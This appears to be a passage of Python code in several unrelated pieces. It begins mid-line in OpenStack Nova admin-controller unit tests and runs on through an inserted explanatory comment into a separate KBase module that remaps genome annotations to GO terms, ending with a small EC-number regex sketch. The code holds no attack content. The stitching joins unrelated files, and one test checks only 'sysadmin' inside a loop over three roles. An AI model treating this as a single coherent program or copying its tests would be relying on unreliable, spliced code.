= datetime.datetime.utcnow() vpn_instance = {'id': 1, 'created_at': isonow, 'fixed_ip': {'address': '127.0.0.1'}} # Inline project object - vpn_port of None to make it invalid project = type('Project', (object,), {'id': 'project', 'vpn_ip': '127.0.0.2', 'vpn_port': None}) # Returns state down for 127.0.0.2 - look at class setup vpn_dict = admin.vpn_dict(project, vpn_instance) self.assertEqual('down - invalid project vpn config', vpn_dict['state']) def test_vpn_dict_non_vpn_instance(self): project = type('Project', (object,), {'id': 'project', 'vpn_ip': '127.0.0.1', 'vpn_port': '1234'}) expected_vpn_dict = {'project_id': 'project', 'public_ip': '127.0.0.1', 'public_port': '1234', 'state': 'pending'} self.assertEqual(expected_vpn_dict, admin.vpn_dict(project, None)) class AdminControllerTestCase(test.TestCase): @classmethod def setUpClass(cls): cls._c = context.get_admin_context() cls._ac = admin.AdminController() def test_admin_controller_to_str(self): self.assertEqual('AdminController', str(admin.AdminController())) def test_describe_instance_types(self): insts = self._ac.describe_instance_types(self._c)['instanceTypeSet'] for inst_name in ('m1.medium', 'm1.large', 'm1.tiny', 'm1.xlarge', 'm1.small',): self.assertIn(inst_name, [i['name'] for i in insts]) def test_register_user(self): registered_user = self._ac.register_user(self._c, 'bob') self.assertEqual('bob', registered_user['username']) def test_describe_user(self): self._ac.register_user(self._c, 'bob') self.assertEqual('bob', self._ac.describe_user(self._c, 'bob')['username']) def test_describe_users(self): self._ac.register_user(self._c, 'bob') users = self._ac.describe_users(self._c) self.assertIn('userSet', users) self.assertEqual('bob', users['userSet'][0]['username']) def test_deregister_user(self): self._ac.register_user(self._c, 'bob') self._ac.deregister_user(self._c, 'bob') self.assertRaises(exception.UserNotFound, self._ac.describe_user, self._c, 'bob') def test_register_project(self): self._ac.register_user(self._c, 'bob') self.assertEqual('bobs_project', self._ac.register_project(self._c, 'bobs_project', 'bob')['projectname']) def test_describe_projects(self): self._ac.register_user(self._c, 'bob') self._ac.register_project(self._c, 'bobs_project', 'bob') projects = 
self._ac.describe_projects(self._c) self.assertIn('projectSet', projects) self.assertEqual('bobs_project', projects['projectSet'][0]['projectname']) def test_deregister_project(self): self._ac.register_user(self._c, 'bob') self._ac.register_project(self._c, 'bobs_project', 'bob') self._ac.deregister_project(self._c, 'bobs_project') self.assertRaises(exception.ProjectNotFound, self._ac.describe_project, self._c, 'bobs_project') def test_describe_project_members(self): self._ac.register_user(self._c, 'bob') self._ac.register_project(self._c, 'bobs_project', 'bob') members = self._ac.describe_project_members(self._c, 'bobs_project') self.assertIn('members', members) self.assertEqual('bob', members['members'][0]['member']) def test_modify_project(self): self._ac.register_user(self._c, 'bob') self._ac.register_project(self._c, 'bobs_project', 'bob') self._ac.modify_project(self._c, 'bobs_project', 'bob', description='I like cake') project = self._ac.describe_project(self._c, 'bobs_project') self.assertEqual('I like cake', project['description']) def test_modify_project_member_add(self): self._ac.register_user(self._c, 'bob') self._ac.register_user(self._c, 'mary') self._ac.register_project(self._c, 'bobs_project', 'bob') self._ac.modify_project_member(self._c, 'mary', 'bobs_project', 'add') members = self._ac.describe_project_members(self._c, 'bobs_project') self.assertIn('mary', [m['member'] for m in members['members']]) def test_modify_project_member_remove(self): self._ac.register_user(self._c, 'bob') self._ac.register_project(self._c, 'bobs_project', 'bob') self._ac.modify_project_member(self._c, 'bob', 'bobs_project', 'remove') members = self._ac.describe_project_members(self._c, 'bobs_project') self.assertNotIn('bob', [m['member'] for m in members['members']]) def test_modify_project_member_invalid_operation(self): self._ac.register_user(self._c, 'bob') self._ac.register_project(self._c, 'bobs_project', 'bob') self.assertRaises(exception.ApiError, self._ac.modify_project_member, self._c, 'bob', 'bobs_project', 'invalid_operation') def test_describe_roles(self): self._ac.register_user(self._c, 'bob') self._ac.register_project(self._c, 'bobs_project', 'bob') roles = self._ac.describe_roles(self._c, 'bobs_project') # Default roles ('sysadmin', 'netadmin', 'developer') should be in here roles = [r['role'] for r in roles['roles']] for role in ('sysadmin', 'netadmin', 'developer'): self.assertIn('sysadmin', roles) def test_modify_user_role_add(self): self._ac.register_user(self._c, 'bob') self._ac.register_project(self._c, 'bobs_project', 'bob') self._ac.modify_user_role(self._c, 'bob', 'itsec') user_roles = self._ac.describe_user_roles(self._c, 'bob') self.assertIn('itsec', [r['role'] for r in user_roles['roles']]) def test_modify_user_role_project_add(self): self._ac.register_user(self._c, 'bob') self._ac.register_project(self._c, 'bobs_project', 'bob') self._ac.modify_user_role(self._c, 'bob', 'developer', 'bobs_project') user_roles = self._ac.describe_user_roles(self._c, 'bob', 'bobs_project') self.assertIn('developer', [r['role'] for r in user_roles['roles']]) def test_modify_user_role_remove(self): self._ac.register_user(self._c, 'bob') self._ac.register_project(self._c, 'bobs_project', 'bob') self._ac.modify_user_role(self._c, 'bob', 'itsec') self._ac.modify_user_role(self._c, 'bob', 'itsec', operation='remove') user_roles = self._ac.describe_user_roles(self._c, 'bob') self.assertNotIn('itsec', [r['role'] for r in user_roles['roles']]) def test_modify_user_role_project_remove(self): 
self._ac.register_user(self._c, 'bob') self._ac.register_project(self._c, 'bobs_project', 'bob') self._ac.modify_user_role(self._c, 'bob', 'developer', 'bobs_project') self._ac.modify_user_role(self._c, 'bob', 'developer', 'bobs_project', 'remove') user_roles = self._ac.describe_user_roles(self._c, 'bob', 'bobs_project') self.assertNotIn('developer', [r['role'] for r in user_roles['roles']]) def test_modify_user_role_invalid(self): self.assertRaises(exception.ApiError, self._ac.modify_user_role, self._c, 'bob', 'itsec', operation='invalid_operation') def test_describe_hosts_compute(self): db.service_create(self._c, {'host': 'host1', 'binary': "nova-compute", 'topic': 'compute', 'report_count': 0, 'availability_zone': "zone1"}) hosts = self._ac.describe_hosts(self._c)['hosts'] self.assertEqual('host1', hosts[0]['hostname']) def test_describe_hosts_volume(self): db.service_create(self._c, {'host': 'volume1', 'binary': "nova-volume", 'topic': 'volume', 'report_count': 0, 'availability_zone': "zone1"}) hosts = self._ac.describe_hosts(self._c)['hosts'] self.assertEqual('volume1', hosts[0]['hostname']) def test_block_external_addresses(self): result = self._ac.block_external_addresses(self._c, '192.168.100.1/24') self.assertEqual('OK', result['status']) self.assertEqual('Added 3 rules', result['message']) def test_block_external_addresses_already_existent_rule(self): self._ac.block_external_addresses(self._c, '192.168.100.1/24') self.assertRaises(exception.ApiError, self._ac.block_external_addresses, self._c, '192.168.100.1/24') def test_describe_external_address_blocks(self): self._ac.block_external_addresses(self._c, '192.168.100.1/24') self.assertEqual( {'externalIpBlockInfo': [{'cidr': u'192.168.100.1/24'}]}, self._ac.describe_external_address_blocks(self._c)) def test_remove_external_address_block(self): self._ac.block_external_addresses(self._c, '192.168.100.1/24') result = self._ac.remove_external_address_block(self._c, '192.168.100.1/24') self.assertEqual('OK', result['status']) self.assertEqual('Deleted 3 rules', result['message']) result = self._ac.describe_external_address_blocks(self._c) self.assertEqual([], result['externalIpBlockInfo']) def test_start_vpn(self): def fake_launch_vpn_instance(self, *args): pass def get_fake_instance_func(): first_call = [True] def fake_instance_get_all_by_project(self, *args): if first_call[0]: first_call[0] = False return [] else: return [{'id': 1, 'user_id': 'bob', 'image_id': str(flags.FLAGS.vpn_image_id), 'project_id': 'bobs_project', 'instance_type_id': '1', 'os_type': 'linux', 'architecture': 'x86-64', 'state_description': 'running', 'vm_state': vm_states.ACTIVE, 'image_ref': '3'}] return fake_instance_get_all_by_project self.stubs.Set(pipelib.CloudPipe, 'launch_vpn_instance', fake_launch_vpn_instance) self.stubs.Set(db, 'instance_get_all_by_project', get_fake_instance_func()) self._ac.register_user(self._c, 'bob') self._ac.register_project(self._c, 'bobs_project', 'bob') self.assertEqual('i-00000001', self._ac.start_vpn(self._c, 'bobs_project')['instance_id']) def test_describe_vpns(self): def fake_instance_get_all_by_project(self, *args): now = datetime.datetime.now() created_at = now - datetime.timedelta(seconds=70) return [{'id': 1, 'user_id': 'bob', 'image_id': str(flags.FLAGS.vpn_image_id), 'project_id': 'bobs_project', 'instance_type_id': '1', 'os_type': 'linux', 'architecture': 'x86-64', 'state_description': 'running', 'created_at': created_at, 'vm_state': vm_states.ACTIVE, 'image_ref': '3'}] self.stubs.Set(db, 
'instance_get_all_by_project', fake_instance_get_all_by_project) self._ac.register_user(self._c, 'bob') self._ac.register_project(self._c, 'bobs_project', 'bob') vpns = self._ac.describe_vpns(self._c) self.assertIn('items', vpns) item = vpns['items'][0] self.assertEqual('i-00000001', item['instance_id']) self.assertIsNone(item['public_port']) self.assertIsNone(item['public_ip']) self.assertEqual('down - invalid project vpn config', item['state']) self.assertEqual(u'bobs_project', item['project_id'])
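# ---------------------------------------------------------------------------
# Hedged illustration (added commentary, not part of the original tests): the
# fixtures above build throwaway stand-ins with the three-argument form of
# type() instead of explicit class statements.  For example,
#
#     project = type('Project', (object,),
#                    {'id': 'project', 'vpn_ip': '127.0.0.1',
#                     'vpn_port': 1234})
#
# binds `project` to a new class whose class attributes are read directly by
# admin.project_dict() and admin.vpn_dict(); it is equivalent to writing
#
#     class Project(object):
#         id = 'project'
#         vpn_ip = '127.0.0.1'
#         vpn_port = 1234
#     project = Project
#
# No instance is created -- the class object itself is passed to the helpers.
# ---------------------------------------------------------------------------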
#BEGIN_HEADER # The header block is where all import statments should live import csv import os import re import subprocess import sys import time import traceback import uuid from pprint import pprint, pformat from biokbase.workspace.client import Workspace as workspaceService from Bio import SeqIO from Bio.Seq import Seq from Bio.SeqRecord import SeqRecord #END_HEADER class ElectronicAnnotationMethods: ''' Module Name: ElectronicAnnotationMethods Module Description: A KBase module: ElectronicAnnotationMethods This module wraps the following methods: interpro2go -> InterPro2GO ec2go -> EC2GO uniprotkb_keyword2go -> UniProtKB-Keyword2GO ''' ######## WARNING FOR GEVENT USERS ####### # Since asynchronous IO can lead to methods - even the same method - # interrupting each other, you must be *very* careful when using global # state. A method could easily clobber the state set by another while # the latter method is running. ######################################### #BEGIN_CLASS_HEADER # Class variables and functions can be defined in this block workspaceURL = None def genome_to_protein_fasta(self, genome, fasta_file): records = [] for feature in genome['features']: if 'protein_translation' not in feature: continue record = SeqRecord(Seq(feature['protein_translation']), id=feature['id'], description=feature['function']) records.append(record) SeqIO.write(records, fasta_file, "fasta") def uniq_seen(self, iterable): seen = set() seen_add = seen.add return [x for x in iterable if not (x in seen or seen_add(x))] def equiv_term_to_string(self, x): s = x['equiv_term'] if 'equiv_name' in x: name = x['equiv_name'] s += ' ' + re.sub(r'^GO:', '', name) return s def add_ontology_string_to_feature(self, fea, s): term, name = s.split(" ", 1) if not 'ontology' in fea: fea['ontology'] = {} if 'GO' not in fea['ontology']: fea['ontology']['GO'] = [] fea['ontology']['GO'].append([term, name]) def add_concat_ontology_string_to_feature(self, fea, s): for ss in s.split(' / '): self.add_ontology_string_to_feature(fea, ss) #END_CLASS_HEADER # config contains contents of config file in a hash or None if it couldn't # be found def __init__(self, config): #BEGIN_CONSTRUCTOR self.workspaceURL = config['workspace-url'] self.scratch = os.path.abspath(config['scratch']) if not os.path.exists(self.scratch): os.makedirs(self.scratch) #END_CONSTRUCTOR pass def remap_annotations_with_interpro2go(self, ctx, params): # ctx is the context object # return variables are: output #BEGIN remap_annotations_with_interpro2go # Print statements to stdout/stderr are captured and available as the method log print('Starting remap_annotations_with_interpro2go method...') # Step 1 - Parse/examine the parameters and catch any errors # It is important to check that parameters exist and are defined, and that nice error # messages are returned to the user if 'workspace' not in params: raise ValueError('Parameter workspace is not set in input arguments') workspace_name = params['workspace'] if 'input_genome' not in params: raise ValueError('Parameter input_genome is not set in input arguments') input_genome = params['input_genome'] if 'output_genome' not in params: raise ValueError('Parameter output_genome is not set in input arguments') output_genome = params['output_genome'] ontology_translation = params.get('ontology_translation') overwrite_function = params.get('overwrite_function') # Step 2- Download the input data # Most data will be based to your method by its workspace name. 
Use the workspace to pull that data # (or in many cases, subsets of that data). The user token is used to authenticate with the KBase # data stores and other services. DO NOT PRINT OUT OR OTHERWISE SAVE USER TOKENS token = ctx['token'] wsClient = workspaceService(self.workspaceURL, token=token) try: # Note that results from the workspace are returned in a list, and the actual data is saved # in the 'data' key. So to get the ContigSet data, we get the first element of the list, and # look at the 'data' field. genome = wsClient.get_objects([{'ref': workspace_name+'/'+input_genome}])[0]['data'] except: exc_type, exc_value, exc_traceback = sys.exc_info() lines = traceback.format_exception(exc_type, exc_value, exc_traceback) orig_error = ''.join(' ' + line for line in lines) raise ValueError('Error loading input Genome object from workspace:\n' + orig_error) print('Got input genome data.') # Load translation object from default or user-specified table translation_ws = workspace_name translation_name = ontology_translation if not translation_name: translation_ws = 'KBaseOntology' translation_name = 'interpro2go' try: translation = wsClient.get_objects([{'ref': translation_ws+'/'+translation_name}])[0]['data'] except: exc_type, exc_value, exc_traceback = sys.exc_info() lines = traceback.format_exception(exc_type, exc_value, exc_traceback) orig_error = ''.join(' ' + line for line in lines) raise ValueError('Error loading OntologyTranslation object from workspace:\n' + orig_error) trans = translation['translation'] print('Got translation table from {}/{}.'.format(translation_ws, translation_name)) # Step 3- Actually perform the interpro2go mapping operation # Create feature protein FASTA as input for interproscan fasta_path = os.path.join(self.scratch, 'protein.fa') interpro_out = os.path.join(self.scratch, 'protein.tsv') self.genome_to_protein_fasta(genome, fasta_path) # Run interproscan in standalone mode cmd = ['interproscan.sh', '-i', fasta_path, '-f', 'tsv', '-o', interpro_out, '--disable-precalc', '-goterms', '-iprlookup', '-hm' ] print('Run CMD: {}'.format(' '.join(cmd))) p = subprocess.Popen(cmd, cwd = self.scratch, shell = False) p.wait() print('CMD return code: {}'.format(p.returncode)) # Add GO terms to Genome object fid_to_go = {} with open(interpro_out, 'r') as tsv: tsv = csv.reader(tsv, delimiter='\t') for row in tsv: if len(row) < 12: continue fid, beg, end, domain = row[0], row[6], row[7], row[11] # orig_go_terms = None # if len(row) >= 14: # orig_go_terms = row[13] go_terms = None key = 'InterPro:'+domain equiv_terms = trans.get(key) if equiv_terms: go = map(lambda x: self.equiv_term_to_string(x), equiv_terms['equiv_terms']) fid_to_go[fid] = ' / '.join(sorted(go)) n_total_features = 0 n_features_mapped = 0 for fea in genome['features']: fid = fea['id'] n_total_features += 1 function = fea.get('function') if not function: continue if fid in fid_to_go: n_features_mapped += 1 go_func = fid_to_go[fid] self.add_concat_ontology_string_to_feature(fea, go_func) if overwrite_function: fea['function'] = go_func print('Mapped {} from "{}" to "{}".'.format(fid, function, go_func)) # anno = fea['annotations'] if 'annotations' in fea else [] # anno.append([fid_to_go[fid], 'interpro2go', int(time.time())]) # print('Mapped {} to {}.'.format(fid, fid_to_go[fid])) # Step 4- Save the new Genome back to the Workspace # When objects are saved, it is important to always set the Provenance of that object. The basic # provenance info is given to you as part of the context object. 
You can add additional information # to the provenance as necessary. Here we keep a pointer to the input data object. provenance = [{}] if 'provenance' in ctx: provenance = ctx['provenance'] # add additional info to provenance here, in this case the input data object reference provenance[0]['input_ws_objects']=[workspace_name+'/'+input_genome] obj_info_list = None try: obj_info_list = wsClient.save_objects({ 'workspace':workspace_name, 'objects': [ { 'type':'KBaseGenomes.Genome', 'data':genome, 'name':output_genome, 'provenance':provenance } ] }) except: exc_type, exc_value, exc_traceback = sys.exc_info() lines = traceback.format_exception(exc_type, exc_value, exc_traceback) orig_error = ''.join(' ' + line for line in lines) raise ValueError('Error saving output Genome object to workspace:\n' + orig_error) info = obj_info_list[0] # Workspace Object Info is a tuple defined as- # absolute ref = info[6] + '/' + info[0] + '/' + info[4] # 0 - obj_id objid - integer valued ID of the object # 1 - obj_name name - the name of the data object # 2 - type_string type - the full type of the data object as: [ModuleName].[Type]-v[major_ver].[minor_ver] # 3 - timestamp save_date # 4 - int version - the object version number # 5 - username saved_by # 6 - ws_id wsid - the unique integer valued ID of the workspace containing this object # 7 - ws_name workspace - the workspace name # 8 - string chsum - md5 of the sorted json content # 9 - int size - size of the json content # 10 - usermeta meta - dictionary of string keys/values of user set or auto generated metadata print('Saved output Genome:'+pformat(info)) # Step 5- Create the Report for this method, and return the results # Create a Report of the method report = 'New Genome saved to: '+str(info[7]) + '/'+str(info[1])+'/'+str(info[4])+'\n' report += 'Number of total features: '+ str(n_total_features) + '\n' report += 'Number of features mapped to GO terms: '+ str(n_features_mapped) + '\n' reportObj = { 'objects_created':[{ 'ref':str(info[6]) + '/'+str(info[0])+'/'+str(info[4]), 'description':'Genome with annotation remapped using interpro2go' }], 'text_message':report } # generate a unique name for the Method report reportName = 'interpro2go_report_'+str(hex(uuid.getnode())) report_info_list = None try: report_info_list = wsClient.save_objects({ 'id':info[6], 'objects':[ { 'type':'KBaseReport.Report', 'data':reportObj, 'name':reportName, 'meta':{}, 'hidden':1, # important! make sure the report is hidden 'provenance':provenance } ] }) except: exc_type, exc_value, exc_traceback = sys.exc_info() lines = traceback.format_exception(exc_type, exc_value, exc_traceback) orig_error = ''.join(' ' + line for line in lines) raise ValueError('Error saving report object to workspace:\n' + orig_error) report_info = report_info_list[0] print('Saved Report: '+pformat(report_info)) output = { 'report_name': reportName, 'report_ref': str(report_info[6]) + '/' + str(report_info[0]) + '/' + str(report_info[4]), 'output_genome_ref': str(info[6]) + '/'+str(info[0])+'/'+str(info[4]), 'n_total_features':n_total_features, 'n_features_mapped':n_features_mapped } print('Returning: '+pformat(output)) #END remap_annotations_with_interpro2go # At some point might do deeper type checking... 
if not isinstance(output, dict): raise ValueError('Method remap_annotations_with_interpro2go return value ' + 'output is not type dict as required.') # return the results return [output] def remap_annotations_with_ec2go(self, ctx, params): # ctx is the context object # return variables are: output #BEGIN remap_annotations_with_ec2go # Print statements to stdout/stderr are captured and available as the method log print('Starting remap_annotations_with_ec2go method...') # Step 1 - Parse/examine the parameters and catch any errors # It is important to check that parameters exist and are defined, and that nice error # messages are returned to the user if 'workspace' not in params: raise ValueError('Parameter workspace is not set in input arguments') workspace_name = params['workspace'] if 'input_genome' not in params: raise ValueError('Parameter input_genome is not set in input arguments') input_genome = params['input_genome'] if 'output_genome' not in params: raise ValueError('Parameter output_genome is not set in input arguments') output_genome = params['output_genome'] ontology_translation = params.get('ontology_translation') overwrite_function = params.get('overwrite_function') # Step 2- Download the input data # Most data will be passed to your method by its workspace name. Use the workspace to pull that data # (or in many cases, subsets of that data). The user token is used to authenticate with the KBase # data stores and other services. DO NOT PRINT OUT OR OTHERWISE SAVE USER TOKENS token = ctx['token'] wsClient = workspaceService(self.workspaceURL, token=token) try: # Note that results from the workspace are returned in a list, and the actual data is saved # in the 'data' key. So to get the Genome data, we get the first element of the list, and # look at the 'data' field.
genome = wsClient.get_objects([{'ref': workspace_name+'/'+input_genome}])[0]['data'] except: exc_type, exc_value, exc_traceback = sys.exc_info() lines = traceback.format_exception(exc_type, exc_value, exc_traceback) orig_error = ''.join(' ' + line for line in lines) raise ValueError('Error loading input Genome object from workspace:\n' + orig_error) print('Got input genome data.') # Load translation object from default or user-specified table translation_ws = workspace_name translation_name = ontology_translation if not translation_name: translation_ws = 'KBaseOntology' translation_name = 'ec2go' try: translation = wsClient.get_objects([{'ref': translation_ws+'/'+translation_name}])[0]['data'] except: exc_type, exc_value, exc_traceback = sys.exc_info() lines = traceback.format_exception(exc_type, exc_value, exc_traceback) orig_error = ''.join(' ' + line for line in lines) raise ValueError('Error loading OntologyTranslation object from workspace:\n' + orig_error) trans = translation['translation'] print('Got translation table from {}/{}.'.format(translation_ws, translation_name)) # Step 3- Actually perform the ec2go mapping operation # Add GO terms to Genome object # print trans n_total_features = 0 n_features_mapped = 0 for fea in genome['features']: n_total_features += 1 fid = fea['id'] function = fea.get('function') if not function: continue matches = re.findall('EC[ :][-0-9]+\.[-0-9]+\.[-0-9]+\.[-0-9]+', function) ec_list = self.uniq_seen(matches) go_list = [] for ec in ec_list: key = ec.replace("EC ", "EC:") equiv_terms = trans.get(key) if equiv_terms: go = map(lambda x: self.equiv_term_to_string(x), equiv_terms['equiv_terms']) go_list.extend(go) if len(go_list): n_features_mapped += 1 go_func = ' / '.join(sorted(go_list)) self.add_concat_ontology_string_to_feature(fea, go_func) if overwrite_function: fea['function'] = go_func print('Mapped {} from "{}" to "{}".'.format(fid, function, go_func)) # Step 4- Save the new Genome back to the Workspace # When objects are saved, it is important to always set the Provenance of that object. The basic # provenance info is given to you as part of the context object. You can add additional information # to the provenance as necessary. Here we keep a pointer to the input data object. 
provenance = [{}] if 'provenance' in ctx: provenance = ctx['provenance'] # add additional info to provenance here, in this case the input data object reference provenance[0]['input_ws_objects']=[workspace_name+'/'+input_genome] obj_info_list = None try: obj_info_list = wsClient.save_objects({ 'workspace':workspace_name, 'objects': [ { 'type':'KBaseGenomes.Genome', 'data':genome, 'name':output_genome, 'provenance':provenance } ] }) except: exc_type, exc_value, exc_traceback = sys.exc_info() lines = traceback.format_exception(exc_type, exc_value, exc_traceback) orig_error = ''.join(' ' + line for line in lines) raise ValueError('Error saving output Genome object to workspace:\n' + orig_error) info = obj_info_list[0] # Workspace Object Info is a tuple defined as- # absolute ref = info[6] + '/' + info[0] + '/' + info[4] # 0 - obj_id objid - integer valued ID of the object # 1 - obj_name name - the name of the data object # 2 - type_string type - the full type of the data object as: [ModuleName].[Type]-v[major_ver].[minor_ver] # 3 - timestamp save_date # 4 - int version - the object version number # 5 - username saved_by # 6 - ws_id wsid - the unique integer valued ID of the workspace containing this object # 7 - ws_name workspace - the workspace name # 8 - string chsum - md5 of the sorted json content # 9 - int size - size of the json content # 10 - usermeta meta - dictionary of string keys/values of user set or auto generated metadata print('Saved output Genome:'+pformat(info)) # Step 5- Create the Report for this method, and return the results # Create a Report of the method report = 'New Genome saved to: '+str(info[7]) + '/'+str(info[1])+'/'+str(info[4])+'\n' report += 'Number of total features: '+ str(n_total_features) + '\n' report += 'Number of features mapped to GO terms: '+ str(n_features_mapped) + '\n' reportObj = { 'objects_created':[{ 'ref':str(info[6]) + '/'+str(info[0])+'/'+str(info[4]), 'description':'Genome with annotation remapped using ec2go' }], 'text_message':report } # generate a unique name for the Method report reportName = 'ec2go_report_'+str(hex(uuid.getnode())) report_info_list = None try: report_info_list = wsClient.save_objects({ 'id':info[6], 'objects':[ { 'type':'KBaseReport.Report', 'data':reportObj, 'name':reportName, 'meta':{}, 'hidden':1, # important! make sure the report is hidden 'provenance':provenance } ] }) except: exc_type, exc_value, exc_traceback = sys.exc_info() lines = traceback.format_exception(exc_type, exc_value, exc_traceback) orig_error = ''.join(' ' + line for line in lines) raise ValueError('Error saving report object to workspace:\n' + orig_error) report_info = report_info_list[0] print('Saved Report: '+pformat(report_info)) output = { 'report_name': reportName, 'report_ref': str(report_info[6]) + '/' + str(report_info[0]) + '/' + str(report_info[4]), 'output_genome_ref': str(info[6]) + '/'+str(info[0])+'/'+str(info[4]), 'n_total_features':n_total_features, 'n_features_mapped':n_features_mapped } print('Returning: '+pformat(output)) #END remap_annotations_with_ec2go # At some point might do deeper type checking... 
if not isinstance(output, dict): raise ValueError('Method remap_annotations_with_ec2go return value ' + 'output is not type dict as required.') # return the results return [output] def remap_annotations_with_uniprotkb_keyword2go(self, ctx, params): # ctx is the context object # return variables are: output #BEGIN remap_annotations_with_uniprotkb_keyword2go # Print statements to stdout/stderr are captured and available as the method log print('Starting remap_annotations_with_uniprotkb_keyword2go method...') # Step 1 - Parse/examine the parameters and catch any errors # It is important to check that parameters exist and are defined, and that nice error # messages are returned to the user if 'workspace' not in params: raise ValueError('Parameter workspace is not set in input arguments') workspace_name = params['workspace'] if 'input_genome' not in params: raise ValueError('Parameter input_genome is not set in input arguments') input_genome = params['input_genome'] if 'output_genome' not in params: raise ValueError('Parameter output_genome is not set in input arguments') output_genome = params['output_genome'] ontology_translation = params.get('ontology_translation') overwrite_function = params.get('overwrite_function') # Step 2- Download the input data # Most data will be based to your method by its workspace name. Use the workspace to pull that data # (or in many cases, subsets of that data). The user token is used to authenticate with the KBase # data stores and other services. DO NOT PRINT OUT OR OTHERWISE SAVE USER TOKENS token = ctx['token'] wsClient = workspaceService(self.workspaceURL, token=token) try: # Note that results from the workspace are returned in a list, and the actual data is saved # in the 'data' key. So to get the ContigSet data, we get the first element of the list, and # look at the 'data' field. 
genome = wsClient.get_objects([{'ref': workspace_name+'/'+input_genome}])[0]['data'] except: exc_type, exc_value, exc_traceback = sys.exc_info() lines = traceback.format_exception(exc_type, exc_value, exc_traceback) orig_error = ''.join(' ' + line for line in lines) raise ValueError('Error loading input Genome object from workspace:\n' + orig_error) print('Got input genome data.') # Load translation object from default or user-specified table translation_ws = workspace_name translation_name = ontology_translation if not translation_name: translation_ws = 'KBaseOntology' translation_name = 'uniprotkb_kw2go' try: translation = wsClient.get_objects([{'ref': translation_ws+'/'+translation_name}])[0]['data'] except: exc_type, exc_value, exc_traceback = sys.exc_info() lines = traceback.format_exception(exc_type, exc_value, exc_traceback) orig_error = ''.join(' ' + line for line in lines) raise ValueError('Error loading OntologyTranslation object from workspace:\n' + orig_error) trans = translation['translation'] print('Got translation table from {}/{}.'.format(translation_ws, translation_name)) # Step 3- Actually perform the uniprotkb_keyword2go mapping operation # Add GO terms to Genome object # print trans n_total_features = 0 n_features_mapped = 0 for fea in genome['features']: n_total_features += 1 fid = fea['id'] function = fea.get('function') if not function: continue go_list = [] for term in trans.keys(): keyword = trans[term]['name'] if function.lower().find(keyword.lower()) >= 0: equiv_terms = trans.get(term) if equiv_terms: go = map(lambda x: self.equiv_term_to_string(x), equiv_terms['equiv_terms']) go_list.extend(go) go_list = self.uniq_seen(go_list) if len(go_list): n_features_mapped += 1 go_func = ' / '.join(sorted(go_list)) self.add_concat_ontology_string_to_feature(fea, go_func) if overwrite_function: fea['function'] = go_func print('Mapped {} from "{}"to "{}".'.format(fid, function, go_func)) # Step 4- Save the new Genome back to the Workspace # When objects are saved, it is important to always set the Provenance of that object. The basic # provenance info is given to you as part of the context object. You can add additional information # to the provenance as necessary. Here we keep a pointer to the input data object. 
provenance = [{}] if 'provenance' in ctx: provenance = ctx['provenance'] # add additional info to provenance here, in this case the input data object reference provenance[0]['input_ws_objects']=[workspace_name+'/'+input_genome] obj_info_list = None try: obj_info_list = wsClient.save_objects({ 'workspace':workspace_name, 'objects': [ { 'type':'KBaseGenomes.Genome', 'data':genome, 'name':output_genome, 'provenance':provenance } ] }) except: exc_type, exc_value, exc_traceback = sys.exc_info() lines = traceback.format_exception(exc_type, exc_value, exc_traceback) orig_error = ''.join(' ' + line for line in lines) raise ValueError('Error saving output Genome object to workspace:\n' + orig_error) info = obj_info_list[0] # Workspace Object Info is a tuple defined as- # absolute ref = info[6] + '/' + info[0] + '/' + info[4] # 0 - obj_id objid - integer valued ID of the object # 1 - obj_name name - the name of the data object # 2 - type_string type - the full type of the data object as: [ModuleName].[Type]-v[major_ver].[minor_ver] # 3 - timestamp save_date # 4 - int version - the object version number # 5 - username saved_by # 6 - ws_id wsid - the unique integer valued ID of the workspace containing this object # 7 - ws_name workspace - the workspace name # 8 - string chsum - md5 of the sorted json content # 9 - int size - size of the json content # 10 - usermeta meta - dictionary of string keys/values of user set or auto generated metadata print('Saved output Genome:'+pformat(info)) # Step 5- Create the Report for this method, and return the results # Create a Report of the method report = 'New Genome saved to: '+str(info[7]) + '/'+str(info[1])+'/'+str(info[4])+'\n' report += 'Number of total features: '+ str(n_total_features) + '\n' report += 'Number of features mapped to GO terms: '+ str(n_features_mapped) + '\n' reportObj = { 'objects_created':[{ 'ref':str(info[6]) + '/'+str(info[0])+'/'+str(info[4]), 'description':'Genome with annotation remapped using uniprotkb_keyword2go' }], 'text_message':report } # generate a unique name for the Method report reportName = 'uniprotkb_keyword2go_report_'+str(hex(uuid.getnode())) report_info_list = None try: report_info_list = wsClient.save_objects({ 'id':info[6], 'objects':[ { 'type':'KBaseReport.Report', 'data':reportObj, 'name':reportName, 'meta':{}, 'hidden':1, # important! make sure the report is hidden 'provenance':provenance } ] }) except: exc_type, exc_value, exc_traceback = sys.exc_info() lines = traceback.format_exception(exc_type, exc_value, exc_traceback) orig_error = ''.join(' ' + line for line in lines) raise ValueError('Error saving report object to workspace:\n' + orig_error) report_info = report_info_list[0] print('Saved Report: '+pformat(report_info)) output = { 'report_name': reportName, 'report_ref': str(report_info[6]) + '/' + str(report_info[0]) + '/' + str(report_info[4]), 'output_genome_ref': str(info[6]) + '/'+str(info[0])+'/'+str(info[4]), 'n_total_features':n_total_features, 'n_features_mapped':n_features_mapped } print('Returning: '+pformat(output)) #END remap_annotations_with_uniprotkb_keyword2go # At some point might do deeper type checking... if not isinstance(output, dict): raise ValueError('Method remap_annotations_with_uniprotkb_keyword2go return value ' + 'output is not type dict as required.') # return the results return [output]
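# ---------------------------------------------------------------------------
# Standalone sketch (not part of the service class above): a minimal,
# self-contained illustration of the EC-number extraction and the
# "EC " -> "EC:" normalization performed in Step 3 of
# remap_annotations_with_ec2go, applied to a made-up feature function string.
# ---------------------------------------------------------------------------
import re

sample_function = "Alcohol dehydrogenase (EC 1.1.1.1) / oxidoreductase (EC:1.1.1.-)"
matches = re.findall(r'EC[ :][-0-9]+\.[-0-9]+\.[-0-9]+\.[-0-9]+', sample_function)
ec_keys = [m.replace("EC ", "EC:") for m in matches]
assert ec_keys == ['EC:1.1.1.1', 'EC:1.1.1.-']
# each key is then looked up in the ec2go translation table, and the resulting
# GO terms are joined with ' / ' before being written back onto the feature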
